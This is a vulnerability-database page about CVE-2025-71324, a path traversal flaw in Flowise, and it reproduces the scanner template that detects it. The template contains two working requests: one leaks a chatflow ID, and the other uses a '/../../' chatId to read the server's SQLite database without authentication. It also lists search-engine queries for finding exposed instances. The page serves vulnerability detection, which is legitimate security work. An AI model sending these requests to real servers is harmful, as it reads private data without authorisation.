Flowise - Path Traversal
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2025-71324 | 25 Jun 202621:41 | – | attackerkb | |
| CVE-2025-71324 | 26 Jun 202605:20 | – | circl | |
| CVE-2025-71324 | 25 Jun 202621:41 | – | cve | |
| CVE-2025-71324 Flowise - Arbitrary File Read via chatId Parameter | 25 Jun 202621:41 | – | cvelist | |
| EUVD-2025-210336 | 26 Jun 202600:32 | – | euvd | |
| CVE-2025-71324 | 25 Jun 202622:16 | – | nvd | |
| GHSA-99PG-HQVX-R4GF Flowise has an Arbitrary File Read | 15 Sep 202520:00 | – | osv | |
| PT-2026-52609 | 25 Jun 202600:00 | – | ptsecurity | |
| VulnCheck KEV: CVE-2025-71324 | 2 Aug 202600:00 | – | vulncheck_kev | |
| CVE-2025-71324 Flowise - Arbitrary File Read via chatId Parameter | 25 Jun 202621:41 | – | vulnrichment |
id: CVE-2025-71324
info:
name: Flowise - Path Traversal
author: theamanrawat,pdteam
severity: high
description: |
Flowise < 3.0.6 contains a path traversal vulnerability caused by improper validation of the chatId parameter in /api/v1/get-upload-file and /api/v1/openai-assistants-file/download endpoints, letting unauthenticated attackers read arbitrary files including sensitive database files.
impact: |
Unauthenticated attackers can read sensitive files, exposing database content and potentially compromising system confidentiality.
remediation: |
Update to version 3.0.6 or later.
reference:
- https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-99pg-hqvx-r4gf
- https://nvd.nist.gov/vuln/detail/CVE-2025-71324
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-71324
epss-score: 0.01379
epss-percentile: 0.6976
cwe-id: CWE-73
metadata:
verified: true
max-request: 2
vendor: FlowiseAI
product: Flowise
shodan-query: title:"Flowise"
fofa-query: title="Flowise"
tags: cve,cve2025,flowise,lfi,path-traversal,unauth,vkev
flow: http(1) && http(2)
http:
- raw:
- |
POST /api/v1/vector/upsert/ HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="?"
Content-Type: text/plain
test
------WebKitFormBoundary7MA4YWxkTrZu0gW--
matchers:
- type: word
part: body
words:
- "EISDIR"
- ".flowise/storage"
condition: and
internal: true
extractors:
- type: regex
name: chatflowId
part: body
internal: true
group: 1
regex:
- 'storage/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})'
- raw:
- |
GET /api/v1/get-upload-file?chatflowId={{chatflowId}}&chatId=/../../&fileName=database.sqlite HTTP/1.1
Host: {{Hostname}}
x-request-from: internal
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SQLite format 3"
- type: status
status:
- 200
# digest: 4a0a0047304502203c9282016207de93902ca702cdd5fbf5cc09c1f5c8b0d430398bb3618e7a6c91022100c7d893b493de6d141673b5db8c9f9d88c256355f6065aac2b9a86b34c2451d96:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Aug 2026 15:24Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.17.5
CVSS 48.7
EPSS0.01379
SSVC